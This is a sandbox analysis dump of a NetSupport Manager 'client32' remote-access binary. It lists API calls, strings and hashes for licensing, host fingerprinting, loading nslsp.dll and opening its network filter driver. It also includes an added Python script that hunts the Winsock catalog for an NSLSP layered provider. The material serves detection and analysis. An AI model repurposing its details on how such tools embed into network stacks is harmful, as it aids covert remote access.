                                                                                                            APIs
                                                                                                              • Part of subcall function 11141240: GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11141275
                                                                                                              • Part of subcall function 11141240: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 11141285
                                                                                                            • _fgets.LIBCMT ref: 11061402
                                                                                                            • _strpbrk.LIBCMT ref: 11061469
                                                                                                            • _fgets.LIBCMT ref: 1106156C
                                                                                                            • _strpbrk.LIBCMT ref: 110615E3
                                                                                                            • __wcstoui64.LIBCMT ref: 110615FC
                                                                                                            • _fgets.LIBCMT ref: 11061675
                                                                                                            • _strpbrk.LIBCMT ref: 1106169B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                            • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                            • API String ID: 716802716-1571441106
                                                                                                            • Opcode ID: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
                                                                                                            • Instruction ID: 7d354751decb521dd2b5a9477f267ff04dc70e6f2396a8d0e1f3593140cd268d
                                                                                                            • Opcode Fuzzy Hash: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
                                                                                                            • Instruction Fuzzy Hash: D6A2C275E0465A9FEB10CF64CC40BEFB7B9AF44309F0481D9E949A7280EB71AA45CF61

                                                                                                             Control-flow Graph
                                                                                                             • Rendered graph omitted. Function at 1102d560, basic blocks spanning 1102d560-1102de98. Windows API calls reached on the graph: GetComputerNameA, LoadLibraryA, GetProcAddress, SetLastError, FreeLibrary, GetCurrentProcessId, wsprintfA (twice), CharUpperA.
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _malloc_memsetwsprintf
                                                                                                            • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$11/09/15 09:21:05 V12.10F2$468325$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                            • API String ID: 3802068140-2539462814
                                                                                                            • Opcode ID: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
                                                                                                            • Instruction ID: d240301f554d32d3b7904e5f3cd70c9da08142028b12ad4ce6a05654279abd09
                                                                                                            • Opcode Fuzzy Hash: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
                                                                                                            • Instruction Fuzzy Hash: B132D675D0026A9FDB12DF94CC84BEDF7B9AB44308F8445E9E958A7280EB706E44CF61
                                                                                                            APIs
                                                                                                              • Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
                                                                                                              • Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
                                                                                                              • Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
                                                                                                              • Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
                                                                                                              • Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
                                                                                                              • Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A
                                                                                                            • AdjustWindowRectEx.USER32(1113DB48,00CE0000,00000001,00000001), ref: 111313B7
                                                                                                            • LoadMenuA.USER32(00000000,000003EC), ref: 111313C8
                                                                                                            • GetSystemMetrics.USER32(00000021), ref: 111313D9
                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 111313E1
                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 111313E7
                                                                                                            • GetDC.USER32(00000000), ref: 111313F3
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111313FE
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 1113140A
                                                                                                            • CreateWindowExA.USER32(00000001,NSMWClass,0237E3F0,00CE0000,80000000,80000000,1113DB48,?,00000000,?,11000000,00000000), ref: 1113145F
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,110F5809,00000001,1113DB48,_debug), ref: 11131467
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                            • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                            • API String ID: 1594747848-1114959992
                                                                                                            • Opcode ID: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                            • Instruction ID: 9cc38207800c48755d7f962ceed396d8e742c52f1043c8e55726c054ea069f44
                                                                                                            • Opcode Fuzzy Hash: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                            • Instruction Fuzzy Hash: 6C31A072E00319AFDB109FE58C84BBFFBB8EB48719F104528FA11B7284D67069408BA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                              • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                              • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                            • std::exception::exception.LIBCMT ref: 1110D1EA
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1110D1FF
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1110D216
                                                                                                            • InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
                                                                                                            • InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
                                                                                                            • EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272
                                                                                                            • LeaveCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D2FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                            • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                            • API String ID: 1976012330-1024648535
                                                                                                            • Opcode ID: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
                                                                                                            • Instruction ID: 3950031055ca146543af7cdf1b279fa91d633e3444a8efa468e47cc8be7809bd
                                                                                                            • Opcode Fuzzy Hash: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
                                                                                                            • Instruction Fuzzy Hash: DD41CFB4E01215AFDB12CFA98C84FAEFBF4FB48708F54853AE419D7344E635A5008BA1
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 110152DA
                                                                                                            • _memset.LIBCMT ref: 1101531E
                                                                                                            • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015358
                                                                                                            Strings
                                                                                                            • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101525B
                                                                                                            • %012d, xrefs: 110152D4
                                                                                                            • NSLSP, xrefs: 11015368
                                                                                                            • PackedCatalogItem, xrefs: 11015342
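                                                                                                             The registry walk recorded above (a "%012d"-formatted subkey name under Protocol_Catalog9\Catalog_Entries, a RegQueryValueExA of PackedCatalogItem, and a search for "NSLSP") is the client checking the Winsock provider catalog for its own layered service provider. The script below is an added hunting example, not code from this report or from NetSupport: it parses PackedCatalogItem blobs and flags catalog entries whose library path mentions NSLSP. It assumes the documented PackedCatalogItem layout (a 260-byte ANSI library path followed by a WSAPROTOCOL_INFOA structure, whose ProtocolChain.ChainLen field lies 40 bytes and szProtocol 116 bytes into the structure); the sample entries, including the NSLSP.dll path, are constructed for the demonstration. On Windows the same parser can be pointed at the live catalog through winreg.

```python
"""Hunt the Winsock2 Protocol_Catalog9 catalog for an NSLSP layered service provider.

Added example; assumed PackedCatalogItem layout: 260-byte ANSI library path, then
WSAPROTOCOL_INFOA (ChainLen at struct offset 40, szProtocol[256] at offset 116).
"""
import struct
import sys

CATALOG_KEY = (r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
               r"\Protocol_Catalog9\Catalog_Entries")
MAX_PATH = 260
WSAPROTOCOL_INFOA_LEN = 372
CHAINLEN_OFF = MAX_PATH + 40     # ProtocolChain.ChainLen (int)
SZPROTOCOL_OFF = MAX_PATH + 116  # szProtocol[256] (ANSI)
PACKED_LEN = MAX_PATH + WSAPROTOCOL_INFOA_LEN


def _cstr(buf):
    """Decode a NUL-terminated ANSI string from a fixed-size field."""
    return buf.split(b"\0", 1)[0].decode("latin-1")


def parse_packed_catalog_item(blob):
    """Return library path, chain length and protocol name from a PackedCatalogItem blob."""
    if len(blob) < PACKED_LEN:
        raise ValueError("PackedCatalogItem too short: %d bytes" % len(blob))
    chain_len = struct.unpack_from("<i", blob, CHAINLEN_OFF)[0]
    return {
        "library_path": _cstr(blob[:MAX_PATH]),
        "chain_len": chain_len,
        # ChainLen 1 = base provider, 0 = layered provider, >1 = chain through an LSP
        "kind": {0: "layered", 1: "base"}.get(chain_len, "chain"),
        "protocol": _cstr(blob[SZPROTOCOL_OFF:SZPROTOCOL_OFF + 256]),
    }


def find_lsp_entries(entries, marker="NSLSP"):
    """entries: iterable of (subkey_name, blob). Returns entries whose DLL path contains marker."""
    hits = []
    for name, blob in entries:
        info = parse_packed_catalog_item(blob)
        if marker.lower() in info["library_path"].lower():
            hits.append((name, info))
    return hits


def build_packed_catalog_item(path, chain_len, protocol):
    """Construct a blob in the assumed layout (used for the offline sample below)."""
    blob = bytearray(PACKED_LEN)
    blob[:len(path)] = path.encode("latin-1")
    struct.pack_into("<i", blob, CHAINLEN_OFF, chain_len)
    blob[SZPROTOCOL_OFF:SZPROTOCOL_OFF + len(protocol)] = protocol.encode("latin-1")
    return bytes(blob)


def read_live_catalog():
    """Windows only: enumerate Catalog_Entries using the same %012d naming the sample uses."""
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CATALOG_KEY) as root:
        count = winreg.QueryInfoKey(root)[0]
        for i in range(1, count + 1):
            name = "%012d" % i
            try:
                with winreg.OpenKey(root, name) as sub:
                    blob, _ = winreg.QueryValueEx(sub, "PackedCatalogItem")
                    entries.append((name, blob))
            except OSError:
                continue  # gaps in numbering are normal after provider removal
    return entries


# Constructed sample catalog: one base provider and two NSLSP entries (paths are hypothetical).
SAMPLE_ENTRIES = [
    ("000000000001", build_packed_catalog_item(
        r"%SystemRoot%\system32\mswsock.dll", 1, "MSAFD Tcpip [TCP/IP]")),
    ("000000000002", build_packed_catalog_item(
        r"C:\Example\NetSupport\NSLSP.dll", 2, "MSAFD Tcpip [TCP/IP] over NSLSP")),
    ("000000000003", build_packed_catalog_item(
        r"C:\Example\NetSupport\NSLSP.dll", 0, "NSLSP")),
]

if __name__ == "__main__":
    entries = read_live_catalog() if sys.platform == "win32" else SAMPLE_ENTRIES
    for name, info in find_lsp_entries(entries):
        print("%s %-8s %s  (%s)" % (name, info["kind"], info["library_path"], info["protocol"]))
```

The chain length is worth keeping in the output: a base provider carries a single-element chain, the LSP itself is registered as a layered (chain length 0) entry, and any chain longer than one routes the listed base protocol through the LSP DLL, which is what makes the provider load into every Winsock-using process.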
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue_memsetwsprintf
• String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
• API String ID: 1333399081-1346142259
• Opcode ID: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
• Instruction ID: bdea00c4cadcb984d55cc41d8ffa963856162fa43bf7957b15c91c952cfd9536
• Opcode Fuzzy Hash: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
• Instruction Fuzzy Hash: 31419071D022299FEB11DB54CC80BEEF7B8EB05318F4441E8E41AA7281EB346B44CF50

APIs
• WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101758C
• CoInitialize.OLE32(00000000), ref: 11017595
• _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
• CoUninitialize.COMBASE ref: 11017620
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: PCSystemTypeEx$Win32_ComputerSystem
• API String ID: 2407233060-578995875
• Opcode ID: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
• Instruction ID: f5474d2ce38f90e0a7ff94217669a9bd078e6126dc5b2c5f9befb888d677ae11
• Opcode Fuzzy Hash: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
• Instruction Fuzzy Hash: C1214CB5E006625BDB50CF648C44B6FBBE48F88348F0004B9FC5DDA188FA78D940C792

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %s%s%s.bin$468325$_HF$_HW$_SW
• API String ID: 2111968516-1833162749
• Opcode ID: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
• Instruction ID: 2d37ec8be248a08c2e3c36772f725827158d619cf10ab6990a6c8ba6e6d701e2
• Opcode Fuzzy Hash: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
• Instruction Fuzzy Hash: 93E09B60D2060C7FF30065588C057AFBB9C1F4931AF40C0E0FEE997A82E93494404A92

APIs
• LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1114310F
• wsprintfA.USER32 ref: 11143146
  • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
  • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
  • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
  • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastLoadMessageProcessString
• String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
• API String ID: 1985783259-2296142801
• Opcode ID: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
• Instruction ID: f51f52dcbd712469e4e57ed30d3ae6ecd606de78ecfb21ce2ea79b628c9a40ce
• Opcode Fuzzy Hash: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
• Instruction Fuzzy Hash: 0B1108FAD012396BD710DAA5DD80FEAF37C9B44B18F004165FB09F7141E630AA01C7A5

APIs
• wsprintfA.USER32 ref: 110312B6
  • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
  • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
  • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
  • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$468325$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-3365254120
• Opcode ID: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
• Instruction ID: 2341575681f6e1d693b2af78dd19dca744ecd147650d17c5e1ce5a0d9c930bd8
• Opcode Fuzzy Hash: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
• Instruction Fuzzy Hash: 78218EB5E00705AFD710DF65DC80BABB7E4EB89718F10856EF825D7681EA34A8108B55

APIs
• CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102E966,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 110151F7
• CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11015208
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                            • String ID: \\.\NSWFPDrv
                                                                                                            • API String ID: 3498533004-85019792
                                                                                                            • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                            • Instruction ID: 8afacd648940fbcf920c8f513ecddd5490900b3845592452e47c7361a4afad73
                                                                                                            • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                            • Instruction Fuzzy Hash: FFD0C971A420347AF231196AAC4CFCBAD0DDB427B5F210260FA3DE51C4C210489182F1
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E
Strings
Memory Dump Source
• Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
• Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
